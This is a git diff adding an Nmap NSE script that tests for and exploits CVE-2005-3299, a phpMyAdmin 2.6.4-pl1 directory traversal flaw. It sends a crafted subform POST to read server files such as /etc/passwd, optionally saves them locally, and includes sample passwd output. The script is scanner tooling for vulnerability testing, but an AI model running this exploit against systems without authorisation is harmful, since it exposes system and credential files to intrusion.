diff options
Diffstat (limited to 'scripts/http-phpmyadmin-dir-traversal.nse')
| -rw-r--r-- | scripts/http-phpmyadmin-dir-traversal.nse | 149 |
1 files changed, 149 insertions, 0 deletions
diff --git a/scripts/http-phpmyadmin-dir-traversal.nse b/scripts/http-phpmyadmin-dir-traversal.nse new file mode 100644 index 0000000..27cfa03 --- /dev/null +++ b/scripts/http-phpmyadmin-dir-traversal.nse @@ -0,0 +1,149 @@ +local rand = require "rand" +local shortport = require "shortport" +local stdnse = require "stdnse" +local string = require "string" +local http = require "http" +local io = require "io" +local vulns = require "vulns" + +description = [[ +Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and +possibly other versions) to retrieve remote files on the web server. + +Reference: +* http://www.exploit-db.com/exploits/1244/ +]] + +--- +-- @usage +-- nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip> +-- nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip> +-- +-- @args http-phpmyadmin-dir-traversal.file Remote file to retrieve. Default: <code>../../../../../etc/passwd</code> +-- @args http-phpmyadmin-dir-traversal.outfile Output file +-- @args http-phpmyadmin-dir-traversal.dir Basepath to the services page. Default: <code>/phpMyAdmin-2.6.4-pl1/</code> +-- +-- @output +-- PORT STATE SERVICE +-- 80/tcp open http +-- | http-phpmyadmin-dir-traversal: +-- | VULNERABLE: +-- | phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion +-- | State: VULNERABLE (Exploitable) +-- | IDs: CVE:CVE-2005-3299 +-- | Description: +-- | PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array. +-- | +-- | Disclosure date: 2005-10-nil +-- | Extra information: +-- | ../../../../../../../../etc/passwd : +-- | root:x:0:0:root:/root:/bin/bash +-- | daemon:x:1:1:daemon:/usr/sbin:/bin/sh +-- | bin:x:2:2:bin:/bin:/bin/sh +-- | sys:x:3:3:sys:/dev:/bin/sh +-- | sync:x:4:65534:sync:/bin:/bin/sync +-- | games:x:5:60:games:/usr/games:/bin/sh +-- | man:x:6:12:man:/var/cache/man:/bin/sh +-- | lp:x:7:7:lp:/var/spool/lpd:/bin/sh +-- | mail:x:8:8:mail:/var/mail:/bin/sh +-- | news:x:9:9:news:/var/spool/news:/bin/sh +-- | uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +-- | proxy:x:13:13:proxy:/bin:/bin/sh +-- | www-data:x:33:33:www-data:/var/www:/bin/sh +-- | backup:x:34:34:backup:/var/backups:/bin/sh +-- | list:x:38:38:Mailing List Manager:/var/list:/bin/sh +-- | irc:x:39:39:ircd:/var/run/ircd:/bin/sh +-- | gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +-- | nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +-- | libuuid:x:100:101::/var/lib/libuuid:/bin/sh +-- | syslog:x:101:103::/home/syslog:/bin/false +-- | sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin +-- | dps:x:1000:1000:dps,,,:/home/dps:/bin/bash +-- | vboxadd:x:999:1::/var/run/vboxadd:/bin/false +-- | mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false +-- | memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false +-- | ../../../../../../../../etc/passwd saved to passwd.txt +-- | +-- | References: +-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299 +-- |_ http://www.exploit-db.com/exploits/1244/ +author = "Alexey Meshcheryakov" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"vuln", "exploit"} + +portrule = shortport.http + +--- +--Writes string to file +--Taken from: hostmap.nse +local function write_file(filename, contents) + local f, err = io.open(filename, "w") + if not f then + return f, err + end + f:write(contents) + f:close() + return true +end + +--Default configuration values +local EXPLOIT_QUERY = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=%s&subform[1][cXIb8O3]=1" +local DEFAULT_FILE = "../../../../../etc/passwd" +local DEFAULT_DIR = "/phpMyAdmin-2.6.4-pl1/" +local EXPLOIT_PATH = "libraries/grab_globals.lib.php" + +action = function(host, port) + local dir = stdnse.get_script_args("http-phpmyadmin-dir-traversal.dir") or DEFAULT_DIR + local evil_uri = dir..EXPLOIT_PATH + local rfile = stdnse.get_script_args("http-phpmyadmin-dir-traversal.file") or DEFAULT_FILE + local evil_postdata = EXPLOIT_QUERY:format(rfile) + local filewrite = stdnse.get_script_args(SCRIPT_NAME..".outfile") + stdnse.debug1("HTTP POST %s%s", stdnse.get_hostname(host), evil_uri) + stdnse.debug1("POST DATA %s", evil_postdata) + + local vuln = { + title = 'phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion', + IDS = {CVE = 'CVE-2005-3299'}, + state = vulns.STATE.NOT_VULN, + description = + [[PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array. +]], + references = { + 'http://www.exploit-db.com/exploits/1244/', + }, + dates = { + disclosure = {year = '2005', month = '10', dat = '10'}, + }, + } + local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port) + + -- Check if we can distinguish vulnerable from non-vulnerable response + local response = http.post(host, port, "/" .. rand.random_alpha(12), + {header = {["Content-Type"] = "application/x-www-form-urlencoded"}}, nil, evil_postdata) + local testable = true + if response.status == 200 then + testable = false + stdnse.debug1("Server responds with 200 for POST to any URI.") + end + response = http.post(host, port, evil_uri, + {header = {["Content-Type"] = "application/x-www-form-urlencoded"}}, nil, evil_postdata) + if response.body and response.status==200 then + stdnse.debug1("response : %s", response.body) + vuln.state = testable and vulns.STATE.EXPLOIT or vulns.STATE.UNKNOWN + vuln.extra_info = rfile.." :\n"..response.body + if filewrite then + local status, err = write_file(filewrite, response.body) + if status then + vuln.extra_info = string.format("%s%s saved to %s\n", vuln.extra_info, rfile, filewrite) + else + vuln.extra_info = string.format("%sError saving %s to %s: %s\n", vuln.extra_info, rfile, filewrite, err) + end + end + elseif response.status==500 then + vuln.state = vulns.STATE.LIKELY_VULN + stdnse.debug1("[Error] File not found:%s", rfile) + stdnse.debug1("response : %s", response.body) + vuln.extra_info = string.format("%s not found.\n", rfile) + end + return vuln_report:make_output(vuln) +end |